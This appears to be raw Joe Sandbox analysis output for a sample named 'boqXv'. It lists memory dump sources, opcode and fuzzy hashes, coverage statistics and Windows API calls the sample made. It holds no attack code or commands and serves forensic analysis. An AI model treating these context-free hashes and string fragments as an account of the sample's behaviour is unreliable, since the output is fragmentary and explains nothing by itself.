                                                • Snapshot File: hcaresult_12_2_167d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 430a4ba790c7bc588eee5ab196928e3d4efb0bd98ebbe6b85a4a7a25092b0aad
                                                • Instruction ID: 5b71b9d980b83efa7639f6198fddb0b270e0a5fa1c094c5d07f13521c19ea111
                                                • Opcode Fuzzy Hash: 430a4ba790c7bc588eee5ab196928e3d4efb0bd98ebbe6b85a4a7a25092b0aad
                                                • Instruction Fuzzy Hash: E421F271604200DFDB05DF98D9C0B26BBA5FF84324F24C9ADEA4A4B356C336D847CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6de3b4188a089bd934cd66362c2a188faa5ba9b4e5fcc1b22cdb4146ef0bd2b
                                                • Instruction ID: 16ba30ecada0eb56bfb094dd70d800fe5d591b05d8da97156067751b73a26cc7
                                                • Opcode Fuzzy Hash: d6de3b4188a089bd934cd66362c2a188faa5ba9b4e5fcc1b22cdb4146ef0bd2b
                                                • Instruction Fuzzy Hash: 5D2104F1E043469FCB12DB39884457FBFB6EFC5160705466AE454C7251EB308905C361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8a04be948804f56a35ea4801ad5299a87e73475db7b47a63206199b5b6e6a25
                                                • Instruction ID: 95ef01071a7a895faa2e90d57424bba1bb1dcc58effc94980ef652f441a81f19
                                                • Opcode Fuzzy Hash: f8a04be948804f56a35ea4801ad5299a87e73475db7b47a63206199b5b6e6a25
                                                • Instruction Fuzzy Hash: 5A31F3B0D01218EFDB20DFAAC588B8EBFF4EB48314F64856AE404BB250C7B59844CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 87fb0584b2f876151ab237089e627a2de3ab55ac026784f6a8e3620fec7a5290
                                                • Instruction ID: 6f08a1354a7728bd064213935f3635eaa7328cf211691702b1d6b3a5fc59ce24
                                                • Opcode Fuzzy Hash: 87fb0584b2f876151ab237089e627a2de3ab55ac026784f6a8e3620fec7a5290
                                                • Instruction Fuzzy Hash: 981103B1A18215DFFB148A68DD802BEB7A5FBC2265F048B7BD066C61D1D62CC900C211
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4bac8f3f2a51d9db4e6a7427d67190c60316a081e5d33a8f3fa385a76b09dc57
                                                • Instruction ID: c9f368b6dfa9f2657f8fb57dbf854e249060bbf41136d0daa2cfef6c6e1a373b
                                                • Opcode Fuzzy Hash: 4bac8f3f2a51d9db4e6a7427d67190c60316a081e5d33a8f3fa385a76b09dc57
                                                • Instruction Fuzzy Hash: 7131F2B0D01258EFDB20CFA9C588B8DBFF5EB48314F24855AE414BB254C7B59885CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7b33ba9d61507caf137d9f6664d282cd88b9a03d48b436ecba7d43af5991464
                                                • Instruction ID: 7335fe0d7044ef39e02d2431258f8b96c23e59d79c9d2125b0e92a6e4f9bc9ed
                                                • Opcode Fuzzy Hash: d7b33ba9d61507caf137d9f6664d282cd88b9a03d48b436ecba7d43af5991464
                                                • Instruction Fuzzy Hash: B02190B4A10A08DFC704CF9AE084999BFF1FF8C318F5285D5E4889B325EB31A991CB05
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1992ee4ea3ee4321ecdd4e2f82d3c930db4968cef86122f12a70336d42080e8
                                                • Instruction ID: dd33a028f0ce78c50aae7061849b64d25a797141cd2c77fecc48801304f9593d
                                                • Opcode Fuzzy Hash: d1992ee4ea3ee4321ecdd4e2f82d3c930db4968cef86122f12a70336d42080e8
                                                • Instruction Fuzzy Hash: 831170B5E0D388EFDB06CB75C9196ADBFF5EF82200B2445EBD805C7652EA349D058721
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e7d06ae8a3a977840c61b76894ed803a6fb8ca68be8f5d155c441ab39cec8b8
                                                • Instruction ID: 5abd0aa5c75f62bdde54dd29a90f059662eb2b4470cd00107020b80861497ed4
                                                • Opcode Fuzzy Hash: 0e7d06ae8a3a977840c61b76894ed803a6fb8ca68be8f5d155c441ab39cec8b8
                                                • Instruction Fuzzy Hash: 762114B5900349AFCB10CF9AD984ADEBFF4FB48310F50842AE919A7310C375A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835183592.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_167d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 9d1a59667ff70ab208dce6c931875072af3eb3c0bb2acb9f1941e95486eb6f95
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 8A11BE75504240CFDB02CF54D9C4B55BF61FF84218F24CAA9D8094B756C33AE44ACB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835183592.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_167d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: df34f7401c4d9fa24025e3d9c4277c2a9a90f2221743b613368dec805ab8f337
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 61119D75504280DFDB06CF54D9C4B15BFA1FF84328F28CAAAD9494B756C33AD44ACBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf376b5a5da0dd63d161c1df07ec3db13a377f8ca762bcef44e5a62f887d91cd
                                                • Instruction ID: 83d73689a531bbe84917823dc00ff5f47d69b93f8bfe624477c31d61076bccbe
                                                • Opcode Fuzzy Hash: cf376b5a5da0dd63d161c1df07ec3db13a377f8ca762bcef44e5a62f887d91cd
                                                • Instruction Fuzzy Hash: 96010874A00208AFD704DFA9D998A9DBFF1AF89204F0AC0D5E448DB362D7309944CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 38115632b0e6e663ed0b93be2a3c1de50e865fb0fa511a962b563ef1cad9d422
                                                • Instruction ID: 1e938828c89f82816a3bd1afb820d273788751f426201624527b08f828419659
                                                • Opcode Fuzzy Hash: 38115632b0e6e663ed0b93be2a3c1de50e865fb0fa511a962b563ef1cad9d422
                                                • Instruction Fuzzy Hash: 45F0B472608119BFAB09DB69DC419FE7FBADFC4250B0581B7E404CB261E631AD5187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe3aa2d55f699ddd118f41b1388b70f01b9dacc67312da8a4ab38b849fd20764
                                                • Instruction ID: cd165f29a304b429835b502eadfe864412c048229e7e2b82849692d69cd7798e
                                                • Opcode Fuzzy Hash: fe3aa2d55f699ddd118f41b1388b70f01b9dacc67312da8a4ab38b849fd20764
                                                • Instruction Fuzzy Hash: 9E01B674A00208AFDB44DFA9C584A9DBFF5EF88304F05C098A8489B365DB30D940CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5258731aee36141f8036c6662f18a9fe1377adbad0fdb5102e560904555070d1
                                                • Instruction ID: fe5ee61792360f0ade36b58bbc1456e4442f90f5b8b08e06a82dddc27afa8596
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: T+-q$[V~*$[V~*$]\`
                                                • API String ID: 0-1849991408
                                                • Opcode ID: 54a14ad09bb851f0cf1120d8f3f68c73da11645e48c63ab3a76608a673863078
                                                • Instruction ID: 89d76e6ad6683dd7167f8ac8e7230381cacf1714fd4a24b1aee86d19c6c27b6f
                                                • Opcode Fuzzy Hash: 54a14ad09bb851f0cf1120d8f3f68c73da11645e48c63ab3a76608a673863078
                                                • Instruction Fuzzy Hash: 6441C3B0A18216DBE7349B65C9003BBB7B0EF92785F04CA66E575DBA89D334C840C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:136
                                                Total number of Limit Nodes:13
                                                [Execution graph 40934: node and edge listing not preserved. API calls named in the graph nodes: CallWindowProcW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CreateWindowExW, GetModuleHandleW, LoadLibraryExW, DuplicateHandle, GlobalMemoryStatusEx]
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7b0550bc6645b15e279e1cb5141da02046387130016b1b5d3d44c0b842d608c
                                                • Instruction ID: d781c3dadc936bf6645f4faeae8dccb2d9e0ef5b3261b2d1f9faf1ec6553f550
                                                • Opcode Fuzzy Hash: e7b0550bc6645b15e279e1cb5141da02046387130016b1b5d3d44c0b842d608c
                                                • Instruction Fuzzy Hash: 9D630B31D10B1A8ACB51EF68C88059DF7B1FF99300F15D79AE458B7221EB70AAD5CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [Control-flow graph 1388 (legend: executed / not executed nodes); graph rendering not preserved]
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0696287E
                                                • GetCurrentThread.KERNEL32 ref: 069628BB
                                                • GetCurrentProcess.KERNEL32 ref: 069628F8
                                                • GetCurrentThreadId.KERNEL32 ref: 06962951
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 0cc5f581418d6c391f437fb67e363f22615bb80cbd30d62dc66640ccc34fd976
                                                • Instruction ID: 5a9431f6f199250453f801227c0f6ad714acb581845ef75b70c60e0acc88de43
                                                • Opcode Fuzzy Hash: 0cc5f581418d6c391f437fb67e363f22615bb80cbd30d62dc66640ccc34fd976
                                                • Instruction Fuzzy Hash: AB5143B0900349CFDB54DFAAD948BDEBBF1AF88304F248469E419A7660D7349984CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [Control-flow graph 1410 (legend: executed / not executed nodes); graph rendering not preserved]
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0696287E
                                                • GetCurrentThread.KERNEL32 ref: 069628BB
                                                • GetCurrentProcess.KERNEL32 ref: 069628F8
                                                • GetCurrentThreadId.KERNEL32 ref: 06962951
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 204ca25e65a367385d4b2a43f1ec701e081e121e798af5d1610374036bbb946e
                                                • Instruction ID: 8f2759806794fa8eb7883a8fc7c506a80eddf6bac3aeb88768fd3303d67b5b85
                                                • Opcode Fuzzy Hash: 204ca25e65a367385d4b2a43f1ec701e081e121e798af5d1610374036bbb946e
                                                • Instruction Fuzzy Hash: 545144B0900349CFDB54DFAAD948BDEBBF1EB88314F208469E419A7660D7349984CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0696AF7E
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b1cf2c655696bd8bfc8dfd776ecc387b36d1fa0aa03474d367de25ecf13eefad
                                                • Instruction ID: f57460d5725d5f8a20aedda30db60efeac0cf835403d32c4d848cb6dd9a35ced
                                                • Opcode Fuzzy Hash: b1cf2c655696bd8bfc8dfd776ecc387b36d1fa0aa03474d367de25ecf13eefad
                                                • Instruction Fuzzy Hash: 8A8167B0A00B058FD7A5DF2AD45476ABBF5FF88300F10892EE48AD7A50DB74E945CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0696D022
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 2e785d47d45475322b47290d0256833315cfe559c38f26dc7cba8f0bf9fabfe9
                                                • Instruction ID: 4a03c750f2d79bcc10fb7109c68c23f150c1eed4937dbe358039882444789f30
                                                • Opcode Fuzzy Hash: 2e785d47d45475322b47290d0256833315cfe559c38f26dc7cba8f0bf9fabfe9
                                                • Instruction Fuzzy Hash: C551D0B1D00349AFDF15CF99C980ADEBFB6BF48314F24816AE518AB220D7719945CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0696D022
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 64bc2695f4e65ac5f6c294add088e6b701dcd1c7764aa4c35fc532bf7868a0bf
                                                • Instruction ID: a5558a843bff3589774e8f245c1f8ff52a5e6ac5d6125a2217359976f68f2503
                                                • Opcode Fuzzy Hash: 64bc2695f4e65ac5f6c294add088e6b701dcd1c7764aa4c35fc532bf7868a0bf
                                                • Instruction Fuzzy Hash: F241BFB1D00349DFDB14CFAAC984ADEBBB5BF48310F24852AE819AB210D7719985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0696F711
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 30d804cb3c8a3e3fbcc45d1b2e498a4afca838fdeacd57c64a1760ec36a1289c
                                                • Instruction ID: c2faf9efc02bb770a636be780940f33cee2359ebb64eb7107f9ec56f5daa671b
                                                • Opcode Fuzzy Hash: 30d804cb3c8a3e3fbcc45d1b2e498a4afca838fdeacd57c64a1760ec36a1289c
                                                • Instruction Fuzzy Hash: D1412CB5900309DFCB54CF5AC448AAABBF5FB88314F24C459E519AB721D775A841CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06962ACF
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 5042042484c7c9f7d1c70981b61c45572cc7e3e44b91ed1d897b39885f069e5a
                                                • Instruction ID: 75d8048aa4bef054189150ad6c11fae73d96fc02c5e8cb53a9470460fb730308
                                                • Opcode Fuzzy Hash: 5042042484c7c9f7d1c70981b61c45572cc7e3e44b91ed1d897b39885f069e5a
                                                • Instruction Fuzzy Hash: 3121D4B59002189FDB10CFAAD984ADEBBF8FB48320F14842AE955A7250D375A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06962ACF
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 42b1d2442f267df54080083eb7f38c40172012482e0b36151a164e2c3beee9f9
                                                • Instruction ID: 885c0548bc1abffeedacc8a82092631ab4d88ab3345318ee6c4195fc0ddf63ac
                                                • Opcode Fuzzy Hash: 42b1d2442f267df54080083eb7f38c40172012482e0b36151a164e2c3beee9f9
                                                • Instruction Fuzzy Hash: 3621C4B59003589FDB10CF9AD984ADEBBF8FB48320F14841AE958A7350D375A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0697E68A), ref: 0697E777
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1921110624.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6970000_boqXv.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: bc8b0eaf355654a8ce27804ff965f43c257d5417fe99970510ba8a7ccf3f1323
                                                • Instruction ID: 8b1f949fb5e5a7b97f023b74ad48a2098fe3b5a4910a0cfe5c9df79de41ad0ac
                                                • Opcode Fuzzy Hash: bc8b0eaf355654a8ce27804ff965f43c257d5417fe99970510ba8a7ccf3f1323
                                                • Instruction Fuzzy Hash: 1F1103B1C006599BCB10DF9AC444B9EFBF4AB48320F10856AD918B7251D378A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0696AFF9,00000800,00000000,00000000), ref: 0696B1EA
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: bb3f6160c4dab2e68df35ce071889aa76ee6f5d34895e58b320db5cd90368d97
                                                • Instruction ID: 476fa4516da01c5f383728e2aa555bc808073ef7dcce5448f18bc0c0070e5982
                                                • Opcode Fuzzy Hash: bb3f6160c4dab2e68df35ce071889aa76ee6f5d34895e58b320db5cd90368d97
                                                • Instruction Fuzzy Hash: 5C11F6B6D003099FDB10CF9AD884ADEFBF8FB48310F10842AE559AB610D375A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0696AFF9,00000800,00000000,00000000), ref: 0696B1EA
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: a37424562dcb15bb4a5d263210ba8205632ca2f476c306d17a83192bb8569976
                                                • Instruction ID: 50f9a0610d49a15075fef5c46fc24fe9a2cd59a755193828bc1e9a8e43420c06
                                                • Opcode Fuzzy Hash: a37424562dcb15bb4a5d263210ba8205632ca2f476c306d17a83192bb8569976
                                                • Instruction Fuzzy Hash: 6511F6B6D003099FDB10CF9AD844ADEFBF9EB48310F20842AE559A7610C375A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0696AF7E
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: fd040312b4c9aafb778850bc26247a7901f05abe15a09c12c75e70d072625d66
                                                • Instruction ID: 7319705591e5b4fffb0402dff415fb54c913c9eb3418be1efca4596c9c066d89
                                                • Opcode Fuzzy Hash: fd040312b4c9aafb778850bc26247a7901f05abe15a09c12c75e70d072625d66
                                                • Instruction Fuzzy Hash: 8D11D2B5C003498FCB10CF9AC544ADEFBF4AB48324F20842AD469B7610C379A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH^q
                                                • API String ID: 0-2549759414
                                                • Opcode ID: e683e187d02ae666c99bdf5a16a89466e9188c0bef629a617ffdf87f5b9d9b93
                                                • Instruction ID: 3fb34b12322afa717a8614a8d6cc328a4fe48272fc2142ff2a8a04327f797c6e
                                                • Opcode Fuzzy Hash: e683e187d02ae666c99bdf5a16a89466e9188c0bef629a617ffdf87f5b9d9b93
                                                • Instruction Fuzzy Hash: C1311431B182029FDB15DF34C614AAE7BE3BB89300F184468D406DB395EE75DD86CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH^q
                                                • API String ID: 0-2549759414
                                                • Opcode ID: 50e070a00bee05ef9268c623586d594e0764dad618a7c30b90811b745557e281
                                                • Instruction ID: b5876dc31af03bf992ff57a5e0c90faa836e936757e6486adedb1944a42027ba
                                                • Opcode Fuzzy Hash: 50e070a00bee05ef9268c623586d594e0764dad618a7c30b90811b745557e281
                                                • Instruction Fuzzy Hash: 0731C1317042029FDB199B34C6546AE77A7BB88300F244468D406DB395EE75DD86CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH^q
                                                • API String ID: 0-2549759414
                                                • Opcode ID: d5eb6a1de66bb973a9fd2d726f434465ba30ba700c04eb8a29f305c473c38244
                                                • Instruction ID: d0a612b27922a96ac35185896882e8923b1cdd6ee86f90921b7c4356f3af75e3
                                                • Opcode Fuzzy Hash: d5eb6a1de66bb973a9fd2d726f434465ba30ba700c04eb8a29f305c473c38244
                                                • Instruction Fuzzy Hash: 4A31E2317042029FDB199B34C6546AE77A7FB88300F18446CD406DB395EE75DD86CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q
                                                • API String ID: 0-2625958711
                                                • Opcode ID: 595faf036f0efc3caf11cfb1accd3887667677396764040351a3cf743f2471cf
                                                • Instruction ID: 4ad5e89ce3ddbc0c0ba0a7e78e6d04e731ddf67fad21303338d0af4c77fb0acc
                                                • Opcode Fuzzy Hash: 595faf036f0efc3caf11cfb1accd3887667677396764040351a3cf743f2471cf
